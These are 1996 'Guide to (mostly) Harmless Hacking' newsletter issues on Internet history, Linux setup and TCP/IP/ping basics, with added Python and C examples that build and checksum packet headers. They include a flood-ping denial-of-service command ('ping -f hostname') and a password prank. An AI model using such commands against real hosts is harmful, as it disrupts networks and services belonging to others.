However, all these wonderful features are also profoundly hackable. The Internet is robust enough to survive -- so its inventors claim -- even nuclear war. Yet it is also so weak that with only a little bit of instruction, it is possible to learn how to seriously spoof the system (forged email) or even temporarily put out of commission other people's Internet host computers (flood pinging, for example.)
On the other hand, the header of every packet that carries a hacker's commands includes the source IP address of the host it came from. Whoever runs that host (or the ISP that handed out the address) can match it against login records to find the account, so it is hard to hide perfectly when on the Internet.
It is this tension between this power and robustness and weakness and potential for confusion that makes the Internet a hacker playground.
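The header fields described above, shown in a worked example added here for this edition (it is not code from the original Guide): the functions below build an IPv4 header with a correct RFC 1071 checksum, then parse one back, verify the checksum, and pull out the sender and recipient addresses. The addresses, TTL and packet sizes are made up for the example, and the sample "captured" packet is constructed inline rather than read off a wire.

```python
"""Build, parse and checksum an IPv4 header (Python 3 standard library only)."""
import socket
import struct

IPV4_HEADER_FMT = "!BBHHHBBH4s4s"   # fixed 20-byte header, network byte order


def inet_checksum(data: bytes) -> int:
    """RFC 1071 Internet checksum: one's-complement sum of 16-bit words."""
    if len(data) % 2:
        data += b"\x00"                       # pad odd-length input
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                        # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(src: str, dst: str, payload_len: int, proto: int = 1,
                      ttl: int = 64, ident: int = 0x1234,
                      flags: int = 0, frag_offset: int = 0) -> bytes:
    """Return a 20-byte IPv4 header (no options) with a valid checksum.
    proto=1 is ICMP, the protocol ping uses. Values are example assumptions."""
    ver_ihl = (4 << 4) | 5                    # version 4, header length 5 * 4 bytes
    total_len = 20 + payload_len
    flags_frag = (flags << 13) | (frag_offset & 0x1FFF)
    header = struct.pack(IPV4_HEADER_FMT, ver_ihl, 0, total_len, ident, flags_frag,
                         ttl, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    csum = inet_checksum(header)              # computed with the checksum field = 0
    return header[:10] + struct.pack("!H", csum) + header[12:]


def parse_ipv4_header(packet: bytes) -> dict:
    """Decode the header at the front of `packet` and verify its checksum.
    A correct header sums to 0xFFFF before complement, so inet_checksum() == 0."""
    if len(packet) < 20:
        raise ValueError("truncated IPv4 header")
    (ver_ihl, _tos, total_len, ident, flags_frag, ttl, proto,
     csum, src, dst) = struct.unpack(IPV4_HEADER_FMT, packet[:20])
    version, ihl = ver_ihl >> 4, (ver_ihl & 0x0F) * 4
    if version != 4 or ihl < 20 or len(packet) < ihl:
        raise ValueError("not a well-formed IPv4 header")
    return {
        "src": socket.inet_ntoa(src),         # who sent it: this is what gives a hacker away
        "dst": socket.inet_ntoa(dst),
        "total_length": total_len,
        "id": ident,
        "more_fragments": bool(flags_frag & 0x2000),
        "frag_offset": (flags_frag & 0x1FFF) * 8,   # in bytes
        "ttl": ttl,
        "protocol": proto,
        "checksum": csum,
        "checksum_ok": inet_checksum(packet[:ihl]) == 0,
    }


def flip_bit(data: bytes, byte_index: int, bit: int = 0) -> bytes:
    """Corrupt one bit, to show the checksum catching damage in transit."""
    return data[:byte_index] + bytes([data[byte_index] ^ (1 << bit)]) + data[byte_index + 1:]


if __name__ == "__main__":
    # Constructed sample: a 56-byte ICMP payload from 10.0.0.1 to 192.168.1.5.
    packet = build_ipv4_header("10.0.0.1", "192.168.1.5", 56) + b"\x00" * 56
    print(parse_ipv4_header(packet))
    print("damaged copy passes checksum:", parse_ipv4_header(flip_bit(packet, 12))["checksum_ok"])
```

The checksum only detects accidental damage; it is not a signature, and anyone who can write raw packets can set the source address to whatever they like and recompute it. That is exactly why a forged source address on its own does not make an attacker anonymous: the reply traffic still has to come back somewhere, and the ISP's login records tie the real address to an account.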
For example, HERE IS YOUR HACKER TIP YOU’VE BEEN WAITING FOR THIS ISSUE:
ftp://ftp.secnet.com
This ftp site was posted on the BUGTRAQ list, which is dedicated to discussion of Unix security holes. Moderator is Aleph One, who is a genuine Uberhacker. If you want to subscribe to the BUGTRAQ, email LISTSERV@netspace.org with message “subscribe BUGTRAQ.”
Now, back to Internet basics.
History of Internet
As mentioned above, the Internet was born as a US Advanced Research Projects Agency (ARPA) effort in 1969. Its inventors called it ARPANET. Because of its value in scientific research, the US National Science Foundation (NSF) built the NSFNET backbone in the mid-1980s and took over the civilian side of the network. But over the years since then it gradually evolved away from any single source of control. In April 1995 NSF cut the last apron strings by shutting down that backbone. Now the Internet is run by no one. It just happens and grows out of the efforts of those who play with it and struggle with the software and hardware.
Nothing at all like this has ever happened before. We now have a computer system with a life of its own. We, as hackers, form a big part of the mutation engine that keeps the Internet evolving and growing stronger. We also form a big part of the immune system of this exotic creature.
The original idea of ARPANET was to design a computer and communications network that would eventually become so redundant, so robust, and so able to operate without centralized control, that it could even survive nuclear war. What also happened was that ARPANET evolved into a being that has survived the end of government funding without even a blip in its growth. Thus its anarchic offspring, the Internet, has succeeded beyond the wildest dreams of its original architects.
The Internet has grown explosively, with no end in sight. At its inception as ARPANET it held only 4 hosts. Fifteen years later, in 1984, it contained only about 1000 hosts. But over the next 5 years this number grew tenfold to 10,000 (1989). Over the following 4 years it grew another hundredfold to 1 million (1993). Two years later, at the end of 1995, the Internet was estimated to have at least 6 million host computers. There are probably over 10 million now. There appears to be no end in sight yet to the incredible growth of this mutant child of ARPANET.
In fact, one concern raised by the exponential growth in the Internet is that demand may eventually far outrace capacity. Because now no entity owns or controls the Internet, if the capacity of the communications links among nodes is too small, and it were to become seriously bogged down, it might be difficult to fix the problem.
For example, in 1988, Robert Morris, Jr. unleashed a self-replicating program on the Internet commonly known as the “Morris Worm.” The worm would make copies of itself on whatever computer it was on and then send copies over communications links to other Internet hosts. It got in by several routes: a debug feature left enabled in many copies of sendmail that let it run commands remotely, a buffer overflow in the fingerd daemon, trust relationships between hosts (rsh and .rhosts files), and guessing weak passwords. It did not need root to spread; it ran as whatever account it had gained.
Quickly the exponential spread of this worm brought much of the Internet to a halt, because hosts were reinfected over and over and the many copies running at once tied up their processors and communications links.
At the time the Internet was still under some semblance of control by the National Science Foundation and was connected to only some tens of thousands of computers, about 6,000 of which were infected. Many sites disconnected themselves from the Net while the worm was analyzed and purged from their host computers, and then reconnected. Morris, meanwhile, was convicted under the Computer Fraud and Abuse Act and sentenced to probation, community service and a fine.
There is some concern that, despite improved security measures (for example, "firewalls"), someone may find a new way to launch a worm that could again shut down the Internet. Given the loss of centralized control, restarting it could be much more time-consuming if this were to happen again.
But reestablishing a centralized control today like what existed at the time of the “Morris Worm” is likely to be impossible. Even if it were possible, the original ARPANET architects were probably correct in their assessment that the Net would become more susceptible to massive failure rather than less if some centralized control were in place.
Perhaps the single most significant feature of today's Internet is this lack of centralized control. No person or organization is now able to control the Internet. In fact, the difficulty of control became an issue in its first years of operation as ARPANET, when email was invented by its users rather than its planners. To the surprise of ARPANET's managers, within a few years email accounted for the bulk of the communication over the system.
Because the Internet had grown to have a fully autonomous, decentralized life of its own, in April 1995, the NSF quit funding NSFNET, the fiber optics communications backbone which at one time had given NSF the technology to control the system. The proliferation of parallel communications links and hosts had by then completely bypassed any possibility of centralized control.
There are several major features of the Internet:
* World Wide Web -- a hypertext publishing network and now the fastest growing part of the Internet.
* email -- a way to send electronic messages
* Usenet -- forums in which people can post and view public messages
* telnet -- a way to login to remote Internet computers
* file transfer protocol -- a way to download files from remote Internet computers
* Internet relay chat -- real-time text conversations -- used primarily by hackers and other Internet old-timers
* gopher -- a way of cataloging and searching for information. This is rapidly growing obsolete.
As you port surfers know, there are dozens of other interesting but less well known services such as whois, finger, ping etc.
The World Wide Web
The World Wide Web is the newest major feature of the Internet; Tim Berners-Lee released it from CERN in 1991. It consists of "Web pages," which are like pages in a book, and links from specially marked words, phrases or symbols on each page to other Web pages. These pages and links together create what is known as "hypertext." This technique makes it possible to tie together many different documents which may be written by many people and stored on many different computers around the world into one hypertext document.
This technique is based upon the Uniform Resource Locator (URL) standard, which specifies how to reach the computer, and the file within it, where the data of a Web page is stored.
A Web URL is of the form http://<host>/<path>, where <host> includes a domain name which must be registered with an organization called InterNIC in order to make sure that two different Web pages (or email addresses, or computer addresses) don't end up being identical. (URLs for other services start with the service name instead of http, for example ftp://.) This registration is one of the few centralized control features of the Internet.
Here's how the hypertext of the World Wide Web works. The reader would come to a statement such as "our company offers LTL truck service to all major US cities." If this statement on the "Web page" is highlighted, that means that a click of the reader's computer mouse will take him or her to a new Web page with details. These may include complete schedules and a form to fill out to order a pickup and delivery.
Some Web pages even offer ways to make electronic payments, usually through credit cards.
However, the security of money transfers over the Internet is still a major issue. Yet despite concerns with verifiability of financial transactions, electronic commerce over the Web is growing fast. In 1994, only some $17.6 million in sales were conducted over the Web. But in 1995, sales reached $400 million. Today, in 1996, the Web is jammed with commercial sites begging for your credit card information.
In addition, the Web is being used as a tool in the distribution of a new form of currency, known as electronic cash. It is conceivable that, if the hurdle of verifiability may be overcome, that electronic cash (often called ecash) may play a major role in the world economy, simplifying international trade. It may also eventually make national currencies and even taxation as we know it obsolete.
Examples of Web sites where one may obtain ecash include the Mark Twain Bank of St. Louis, MO (http://www.marktwain.com) and Digicash of Amsterdam, The Netherlands (http://www.digicash.com).
The almost out-of-control nature of the Internet manifests itself on the World Wide Web. The author of a Web page does not need to get permission or make any arrangement with the authors of other Web pages to which he or she wishes to establish links. Links may be established automatically simply by programming in the URLs of desired Web page links.
Conversely, the only way the author of a Web page can prevent other people from reading it or establishing hypertext links to it is to set up some form of access control, such as a password (or by not having communications links to the rest of the Internet).
A problem with the World Wide Web is how to find things on it. Just as anyone may hook a new computer up to the Internet, so also there is no central authority with control or even knowledge of what is published where on the World Wide Web. No one needs to ask permission of a central authority to put up a Web page.
Once a user knows the address (URL) of a Web page, or at least the URL of a Web page that links eventually to the desired page, then it is possible (so long as communications links are available) to almost instantly hook up with this page.
Because of the value of knowing URLs, there now are many companies and academic institutions that offer searchable indexes (located on the Web) to the World Wide Web. Automated programs such as Web crawlers search the Web and catalog the URLs they encounter as they travel from hypertext link to hypertext link. But because the Web is constantly growing and changing, there is no way to create a comprehensive catalog of the entire Web.
Email
Email is the second oldest use of the Internet, dating back to the ARPAnet of 1971. (The first use was to allow people to remotely log in to their choice of one of the four computers on which ARPAnet was launched in 1969.)
There are two major uses of email: private communications, and broadcasted email. When broadcasted, email serves to make announcements (one-way broadcasting), and to carry on discussions among groups of people such as our Happy Hacker list. In the group discussion mode, every message sent by every member of the list is broadcasted to all other members.
The two most popular program types used to broadcast to email discussion groups are majordomo and listserv.
Usenet
Usenet was a natural outgrowth of the broadcasted email group discussion list. One problem with email lists is that there was no easy way for people new to these groups to join them. Another problem is that as the group grows, a member may be deluged with dozens or hundreds of email messages each day.
In 1979 these problems were addressed by the launch of Usenet. Usenet consists of news groups which carry on discussions in the form of "posts." Unlike an email discussion group, these posts are stored, typically for two weeks or so, awaiting potential readers. As new posts are submitted to a news group, they are broadcast to all Internet hosts that are subscribed to carry the news groups to which these posts belong.
With many Internet connection programs you can see the similarities between Usenet and email. Both have similar headers, which track their movement across the Net. Some programs such as Pine are set up to send the same message simultaneously to both email addresses and newsgroups. All Usenet news readers allow you to email the authors of posts, and many also allow you to email the posts themselves to yourself or other people.
Now, here is a quick overview of the Internet basics we plan to cover in the next several issues of Guide to (mostly) Harmless Hacking:
1. Unix
We discuss “shells” which allow one to write programs (“scripts”) that automate complicated series of Unix commands. The reader is introduced to the concept of scripts which perform hacking functions. We introduce Perl, a scripting language used for some of the most elite of hacking tools, such as SATAN.
3. TCP/IP and UUCP
This chapter covers the communications links that bind together the Internet from a hackers' perspective. Extra attention is given to UUCP since it is so hackable.
4. Internet Addresses, Domain Names and Routers
The reader learns how information is sent to the right places on the Internet, and how hackers can make it go to the wrong places! How to look up UUCP hosts (which are not under the domain name system) is included.
5. Fundamentals of Elite Hacking: Ports, Packets and File Permissions
This section lets the genie of serious hacking out of the bottle. It offers a series of exercises in which the reader can enjoy gaining access to almost any randomly chosen Internet host. In fact, by the end of the chapter the reader will have had the chance to practice several dozen techniques for gaining entry to other peoples' computers. Yet these hacks we teach are 100% legal!
_________________________________________________________
Want to subscribe to this list? Email hacker@techbroker.com with the message “subscribe happyhacker.” Want to share some kewl stuph with the Happy Hacker list? Send your messages to hacker@techbroker.com. To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com. Please direct flames to dev/null@techbroker.com. Happy hacking!
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end.
________________________________________________________
________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 2 Number 2
Linux!
________________________________________
Unix has become the primo operating system of the Internet. In fact, Unix is the most widely used operating system in the world among computers with more power than PCs.
True, Windows NT is coming up fast as a common Internet operating system, and is sooo wonderfully buggy that it looks like it could become the number one favorite to crack into. But today Unix in all its wonderful flavors still is the operating system to know in order to be a truly elite hacker.
So far we have assumed that you have been hacking using a shell account that you get through your Internet Service Provider (ISP). A shell account allows you to give Unix commands on one of your ISP's computers. But you don't need to depend on your ISP for a machine that lets you play with Unix. You can run Unix on your own computer and with a SLIP or PPP connection be directly connected to the Internet.
***********************
Newbie note: Serial Line Internet Protocol (SLIP) and Point-to-Point Protocol (PPP) connections give you a temporary Internet Protocol (IP) address that puts your own computer directly on the Internet. You need one of these to run a graphical Web browser that shows you pictures instead of text only. So if you can see pictures on the Web, you already have one of these available to you.
The advantage of using one of these direct connections for your hacking activities is that you will not leave behind a shell log file on your ISP's machine for the sysadmin to pore over. (Your ISP can still log when you dialed in and which IP address you were given, and every host you touch sees that address.) Even if you are not breaking the law, a shell log file that shows you doing lots of hacker stuph can be enough for some sysadmins to summarily close your account.
********************
What is the best kind of computer to run Unix on? Unless you are a wealthy hacker who thinks nothing of buying a Sun SPARC workstation, you'll probably do best with some sort of PC. There are almost countless variants of Unix that run on PCs, and a few for Macs. Most of them are free for download, or inexpensively available on CD-ROMs.
The three most common variations of Unix that run on PCs are Sun's Solaris, FreeBSD and Linux. Solaris costs around $700. Enough said. FreeBSD is really, really good. But you can't find many manuals or newsgroups that cover FreeBSD.
Linux, however, has the advantage of being available in many variants (so you can have fun mixing and matching programs from different Linux offerings). Most importantly, Linux is supported by many manuals, news groups, mail lists and Web sites. If you have hacker friends in your area, most of them probably use Linux and can help you out.
*********************
Historical note: Linux was begun in 1991 by Linus Torvalds, then a student at the University of Helsinki, who wrote the first kernel himself and then took in contributions from programmers around the world. Linux is distributed under the GNU General Public License. Under this license, Linux may be redistributed to anyone, and the source code must be made available along with it. Anyone can sell any variant of Linux and modify it and repackage it. Contributors keep the copyright on what they write, but anyone who distributes a modified version of Linux must release the changes under the same license, providing source code to the recipients and allowing them to reuse and redistribute it, even commercially, without charging licensing fees. This arrangement is known as a "copyleft."
Under this arrangement the original creators of Linux receive no licensing or shareware fees. Linus Torvalds and the many others who have contributed to Linux have done so from the joy of programming and a sense of community with all of us who will hopefully use Linux in the spirit of good guy hacking. Viva Linux! Viva Torvalds!
**********************
Linux consists of the operating system itself (called the "kernel") plus a set of associated programs.
The kernel, like all types of Unix, is a multitasking, multi-user operating system. Although it uses a different file system, and hence is not directly compatible with DOS and Windows, it is flexible enough that many DOS programs and some Windows programs can be run under Linux through emulators. So a power user will probably want to boot up in Linux and then be able to run DOS and Windows programs from Linux.
Associated programs that come with most Linux distributions may include:
* a shell program (Bourne Again Shell -- BASH -- is most common);
* compilers for programming languages such as Fortran-77 (my favorite!), C, C++, Pascal, LISP, Modula-2, Ada, Basic (the best language for a beginner), and Smalltalk.;
* the X Window System (usually just called X), a graphical user interface
* utility programs such as the email reader Pine (my favorite) and Elm
Top ten reasons to install Linux on your PC:
1.When Linux is outlawed, only outlaws will own Linux.
2. When installing Linux, it is so much fun to run fdisk without backing up first.
3.The flames you get from asking questions on Linux newsgroups are of a higher quality than the flames you get for posting to alt.sex.bestiality.
4.No matter what flavor of Linux you install, you'll find out tomorrow there was a far more 3l1te version you should have gotten instead.
5.People who use Free BSD or Solaris will not make fun of you. They will offer their sympathy instead.
6.At the next Def Con you'll be able to say stuph like "so then I su-ed to his account and grepped all his files for 'kissyface'." Oops, grepping other people's files is a no-no, forget I ever suggested it.
7.Port surf in privacy.
8.One word: exploits.
9.Installing Linux on your office PC is like being a postal worker and bringing an Uzi to work.
10.But - - if you install Linux on your office computer, your boss won't have a clue what that means.
What types of Linux work best? It depends on what you really want. Redhat Linux is famed for being the easiest to install. The Walnut Creek Linux 3.0 CD-ROM set is also really easy to install -- for Linux, that is! My approach has been to get lots of Linux versions and mix and match the best from each distribution.
I like the Walnut Creek version best because with my brand X hardware, its autodetection feature was a life-saver.
INSTALLING LINUX is not for the faint of heart! Several tips for surviving installation are:
1) Although you can in theory run Linux on a 386 with 4 MB RAM and two floppy drives, it is *much* easier with a 486 or above with 8 MB RAM, a CD-ROM, and at least 200 MB free hard disk space.
2) Know as much as possible about what type of mother board, modem, hard disk, CD-ROM, and video card you have. If you have any documentation for these, have them on hand to reference during installation.
3) It works better to use hardware that is name-brand and somewhat out-of-date on your computer. Because Linux device drivers are written by volunteers, it doesn't offer drivers for all the latest hardware. And if your hardware is like mine -- lots of Brand X and El Cheapo stuph, you can take a long time experimenting with what drivers will work.
4) Before beginning installation, back up your hard disk(s)! In theory you can install Linux without harming your DOS/Windows files. But we are all human, especially if following the advice of point 7).
5) Get more than one Linux distribution. The first time I successfully installed Linux, I finally hit on something that worked by using the boot disk from one distribution with the CD-ROM for another. In any case, each Linux distribution had different utility programs, operating system emulators, compilers and more. Add them all to your system and you will be set up to become beyond elite.
6) Buy a book or two or three on Linux. I didn't like any of them! But they are better than nothing. Most books on Linux come with one or two CD-ROMs that can be used to install Linux. But I found that what was in the books did not exactly coincide with what was on the CD-ROMs.
7) I recommend drinking while installing. It may not make debugging go any faster, but at least you won't care how hard it is.
Now I can almost guarantee that even following all these 6 pieces of advice, you will still have problems installing Linux. Oh, do I have 7 advisories up there? Forget number 7. But be of good cheer. Since everyone else also suffers mightily when installing and using Linux, the Internet has an incredible wealth of resources for the Linux-challenged.
If you are allergic to getting flamed, you can start out with Linux support Web sites.
The best I have found is http://sunsite.unc.edu/pub/Linux/. It includes the Linux Frequently Asked Questions list (FAQ), available from sunsite.unc.edu:/pub/Linux/docs/FAQ.
In the directory /pub/Linux/docs on sunsite.unc.edu you'll find a number of other documents about Linux, including the Linux INFO-SHEET and META-FAQ,
The Linux HOWTO archive is on the sunsite.unc.edu Web site at: /pub/Linux/docs/HOWTO. The directory /pub/Linux/docs/LDP contains the current set of LDP manuals.
You can get ``Linux Installation and Getting Started'' from sunsite.unc.edu in /pub/Linux/docs/LDP/install-guide. The README file there describes how you can order a printed copy of the book of the same name (about 180 pages).
Now if you don't mind getting flamed, you may want to post questions to the amazing number of Usenet news groups that cover Linux. These include:
comp.os.linux.advocacy Benefits of Linux compared
comp.os.linux.development.system Linux kernels, device drivers
comp.os.linux.x Linux X Window System servers
comp.os.linux.development.apps Writing Linux applications
comp.os.linux.hardware Hardware compatibility
comp.os.linux.setup Linux installation
comp.os.linux.networking Networking and communications
comp.os.linux.answers FAQs, How-To's, READMEs, etc.
linux.redhat.misc
alt.os.linux Use comp.os.linux.* instead
alt.uu.comp.os.linux.questions Usenet University helps you
comp.os.linux.announce Announcements important to Linux
comp.os.linux.misc Linux-specific topics
Want your Linux free? Tobin Fricke has pointed out that "free copies of Linux CD-ROMs are available from the Linux Support & CD Giveaway web site at http://emile.math.ucsb.edu:8000/giveaway.html. This is a project where people donate Linux CDs that they don't need any more. The project was seeded by Linux Systems Labs, who donated 800 Linux CDs initially! Please remember to donate your Linux CDs when you are done with them. If you live near a computer swap meet, Fry's, Microcenter, or other such place, look for Linux CDs there. They are usually under $20, which is an excellent investment. I personally like the Linux Developer's Resource by Infomagic, which is now up to a seven CD set, I believe, which includes all major Linux distributions (Slackware, Redhat, Debian, Linux for DEC Alpha to name a few) plus mirrors of tsx11.mit.edu and sunsite.unc.edu/pub/linux plus much more. You should also visit the WONDERFUL linux page at http://sunsite.unc.edu/linux, which has tons of information, as well as http://www.linux.org/. You might also want to check out http://www.redhat.com/ and http://www.caldera.com/ for more information on commercial versions of linux (which are still freely available under GNU)."
How about Linux security? Yes, Linux, like every operating system, is imperfect. Eminently hackable, if you really want to know. So if you want to find out how to secure your Linux system, or if you should come across one of the many ISPs that use Linux and want to go exploring (oops, forget I wrote that), here's where you can go for info:
ftp://info.cert.org/pub/cert_advisories/CA-94:01.network.monitoring.attacks
ftp://info.cert.org/pub/tech_tips/root_compromise
http://bach.cis.temple.edu/linux/linux-security/
http://www.geek-girl.com/bugtraq/
There is also help for Linux users on Internet Relay Chat (IRC). Ben (cyberkid@usa.net) hosts a channel called #LinuxHelp on the Undernet IRC server.

Last but not least, if you want to ask Linux questions on the Happy Hacker list, you're welcome. We may be the blind leading the blind, but what the heck!
________________________________________
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end.
________________________________________
____________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 2 Number 3
Introduction to TCP/IP. That means packets! Datagrams! Ping oversize packet denial of service exploit explained. But this hack is a lot less mostly harmless than most. Don't try this at home...
____________________________________________________________
If you have been on the Happy Hacker list for awhile, you've been getting some items forwarded from the Bugtraq list on a new ping packet exploit.
Now if this has been sounding like gibberish to you, relax. It is really very simple. In fact, it is so simple that if you use Windows 95, by the time you finish this article you will know a simple, one-line command that you could use to crash many Internet hosts and routers.
*************************************************
YOU CAN GO TO JAIL WARNING: This time I'm not going to implore the wannabe evil genius types on this list to be virtuous and resist the temptation to misuse the information I'm about to give them. See if I care! If one of those guys gets caught crashing thousands of Internet hosts and routers, not only will they go to jail and get a big fine. We'll all think he or she is a dork. This exploit is a no-brainer, one-line command from Windows 95. Yeah, the operating system that is designed for clueless morons. So there is nothing elite about this hack. What is elite is being able to thwart this attack.
**************************************************
**************************************************
NEWBIE NOTE: If packets, datagrams, and TCP/IP aren't exactly your bosom buddies yet, believe me, you need to really get in bed with them in order to call yourself a hacker. So hang in here for some technical stuff. When we are done, you'll have the satisfaction of knowing you could wreak havoc on the Internet, but are too elite to do so.
A packet is a way to send information electronically that keeps out errors. The idea is that no transmission technology is perfect. Have you ever played the game "telephone"? You get a dozen or so people in a circle and the first person whispers a message to the second. Something like "The bun is the lowest form of wheat." The second person whispers to the third, "A bum is the lowest form of cheating." The third whispers, "Rum is the lowest form of drinking." And so on. It's really fun to find out how far the message can mutate as it goes around the circle.
But when, for example, you get email, you would prefer that it isn't messed up. So the computer that sends the email breaks it up into little pieces called datagrams. Then it wraps things around each datagram that tell what computer it needs to go to, where it came from, and that check whether the datagram might have been garbled. These wrapped up datagram packages are called "packets."
Now if the computer sending email to you were to package a really long message into just one packet, chances are pretty high that it will get messed up while on its way to the other computer. Bit burps. So when the receiving computer checks the packet and finds that it got messed up, it will throw it away and tell the other computer to send it again. It could take a long time until this giant packet gets through intact.
But if the message is broken into a lot of little pieces and wrapped up into bunches of packets, most of them will be good and the receiving computer will keep them. It will then tell the sending computer to retransmit just the packets that messed up. Then when all the pieces finally get there, the receiving computer puts them together in the right order and lo and behold, there is the complete, error-free email.
TCP/IP stands for Transmission Control Protocol/Internet Protocol. It tells computers that are hooked up to the Internet how to package up messages into packets and how to read these packets from other computers. Ping uses TCP/IP to make its packets.
**********************************************
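How the receiving computer actually checks that a datagram "got messed up" is worth seeing in code. The following is an added example in C, not from the Guide, of the Internet checksum (RFC 1071) that IP, ICMP, TCP and UDP all wrap around their data: it builds a small ICMP echo request of the kind ping sends, verifies it the way a receiver does, then flips one bit and shows the receiver rejecting it. The function names, the identifier 0x1234 and the "hello" payload are constructed for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* RFC 1071 Internet checksum: add the data as big-endian 16-bit words in
 * one's-complement arithmetic, then complement the result. */
uint16_t inet_checksum(const uint8_t *data, size_t len)
{
    uint32_t sum = 0;
    while (len > 1) {
        sum += (uint32_t)data[0] << 8 | data[1];
        data += 2;
        len -= 2;
    }
    if (len == 1)                      /* odd trailing byte: pad with a zero byte */
        sum += (uint32_t)data[0] << 8;
    while (sum >> 16)                  /* fold the carries back into 16 bits */
        sum = (sum & 0xffffu) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Build an ICMP echo request (type 8, code 0) with identifier, sequence
 * number and payload, then fill in the checksum over the whole message.
 * Returns the message length, or 0 if the buffer is too small. */
size_t build_echo_request(uint8_t *msg, size_t cap, uint16_t id, uint16_t seq,
                          const uint8_t *payload, size_t plen)
{
    size_t len = 8 + plen;
    if (cap < len) return 0;
    msg[0] = 8;                        /* ICMP_ECHO */
    msg[1] = 0;                        /* code */
    msg[2] = msg[3] = 0;               /* checksum field is zero while summing */
    msg[4] = id >> 8;  msg[5] = id & 0xff;
    msg[6] = seq >> 8; msg[7] = seq & 0xff;
    memcpy(msg + 8, payload, plen);
    uint16_t c = inet_checksum(msg, len);
    msg[2] = c >> 8;
    msg[3] = c & 0xff;
    return len;
}

/* A receiver sums the message with the checksum field included: an intact
 * message sums to 0xFFFF, so the complement comes out zero. */
int icmp_checksum_ok(const uint8_t *msg, size_t len)
{
    return inet_checksum(msg, len) == 0;
}

/* An echo request whose every byte but the type is zero has a single
 * non-zero word, 0x0800, so its checksum is ~0x0800 = 0xF7FF. */
uint16_t all_zero_echo_checksum(void)
{
    uint8_t hdr[8] = { 8, 0, 0, 0, 0, 0, 0, 0 };
    return inet_checksum(hdr, sizeof hdr);
}

/* Constructed demo: build a request carrying "hello", confirm it verifies,
 * flip one bit in the payload and confirm the receiver now rejects it.
 * Returns 1 when both outcomes are as expected. */
int checksum_demo(void)
{
    uint8_t msg[64];
    const uint8_t payload[] = "hello";
    size_t len = build_echo_request(msg, sizeof msg, 0x1234, 1, payload, 5);
    if (len == 0 || !icmp_checksum_ok(msg, len)) return 0;
    msg[10] ^= 0x01;                   /* one bit of damage in the payload */
    return !icmp_checksum_ok(msg, len);
}
```

The last function reproduces the shortcut Fenner uses in the exploit program later in this issue: because his datagram is all zeros apart from the ICMP type byte, he can write the checksum as `htons(~(ICMP_ECHO << 8))` without summing anything. Note that the checksum only catches accidental damage; it is not a signature, and anyone who can alter a packet can recompute it.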
"Ping" is a command that sends a feeler out from your computer to another computer to see if it is turned on and hooked to the same network you are on. On the Internet there are some ten million computers that you can ping.
Ping is a command you can give, for example, from the Unix, Windows 95 and Windows NT operating systems. It is part of the Internet Control Message Protocol (ICMP), which is used to troubleshoot TCP/IP networks. What it does is tell a remote computer to echo back a ping. So if you get your ping back, you know that computer is alive. Furthermore, some forms of the ping command will also tell you how long it takes for a message to go out to that computer and come back again.
But how does your computer know that the ping it just sent out actually echoed back from the targeted computer? The datagram is the answer. The ping sent out a datagram. If the returning ping holds this same datagram, you know it was your ping that just echoed back.
The basic format of this command is simply:
ping hostname
where "hostname" is the Internet address of the computer you want to check out.
When I give this command from Sun Release 4.1 Unix, I get the answer "hostname is alive."
**************************************
TECHNICAL TIP: Because of the destructive powers of ping, many Internet Service Providers hide the ping program in their shell accounts where clueless newbies can't get their hands on it. If your shell account says "command not found" when you enter the ping command, try:
/usr/etc/ping hostname
If this doesn't work, either try the command "whereis ping" or complain to your ISP's tech support. They may have disabled ping for ordinary users, but if you convince tech support you are a good Internet citizen they may let you use it.
***************************************
****************************************
NEWBIE NOTE: You say you can't find a way to ping from your on-line service? That may be because you don't have a shell account. But there is one thing you really need in order to hack: A SHELL ACCOUNT!!!!
The reason hackers make fun of people with America Online accounts is because that ISP doesn't give out shell accounts. This is because America Online wants you to be good boys and girls and not hack!
A "shell account" is an Internet account in which your computer becomes a terminal of one of your ISP's host computers. Once you are in the "shell" you can give commands to the operating system (which is usually Unix) just like you were sitting there at the console of one of your ISP's hosts.
You may already have a shell account but just not know how to log on to it. Call tech support with your ISP to find out whether you have one, and how to get on it.
***************************************
There are all sorts of fancy variations on the ping command. And, guess what, whenever there is a command you give over the Internet that has lots of variations, you can just about count on there being something hackable in there. Muhahaha!
The flood ping is a simple example. If your operating system will let you get away with giving the command:
-> ping -f hostname
it sends out a veritable flood of pings, as fast as your ISP's host machine can make them. This keeps the host you've targeted so busy echoing back your pings that it can do little else. It also puts a heavy load on the network.
Hackers with primitive skill levels will sometimes get together and use several of their computers at once to simultaneously ping some victim's Internet host computer. This will generally keep the victim's computer too busy to do anything else. It may even crash. However, the down side (from the attackers' viewpoint) is that it keeps the attackers' computers tied up, too.
**************************************
NETIQUETTE NOTE: Flood pinging a computer is extremely rude. Get caught doing this and you will be lucky if the worst that happens is your on-line service provider closes your account. Do this to a serious hacker and you may need an identity transplant.
If you should start a flood ping kind of by accident, you can shut it off by holding down the control key and pressing "c" (control-c).
**************************************
*************************************
EVIL GENIUS TIP: Ping yourself! If you are using some sort of Unix, your operating system will let you use your computer to do just about anything to itself that it can do to other computers. The network address that takes you back to your own host computer is localhost (or 127.0.0.1). Here's an example of how I use localhost:
[65] ->telnet localhost
Trying 127.0.0.1 ...
Connected to localhost.
Escape character is '^]'.


SunOS UNIX (slug)

login:
See, I'm back to the login sequence for the computer named "slug" all over again.
Now I ping myself:
[68] ->/usr/etc/ping localhost
localhost is alive
This gives the same result as if I were to command:
[69] ->/usr/etc/ping llama
llama.swcp.com is alive
****************************************
*****************************************
MUHAHAHA TIP: Want to yank someone's chain? Tell him to ftp to 127.0.0.1 and log in using his or her own user name and password for kewl warez! My ex-husband Keith Henson did that to the Church of Scientology. The COGs ftp-ed to 127.0.0.1 and discovered all their copyrighted scriptures. They assumed this was on Keith's computer, not theirs. They were *so* sure he had their scriptures that they took him to court. The judge, when he realized they were simply looping back to their own computer, literally laughed them out of court.
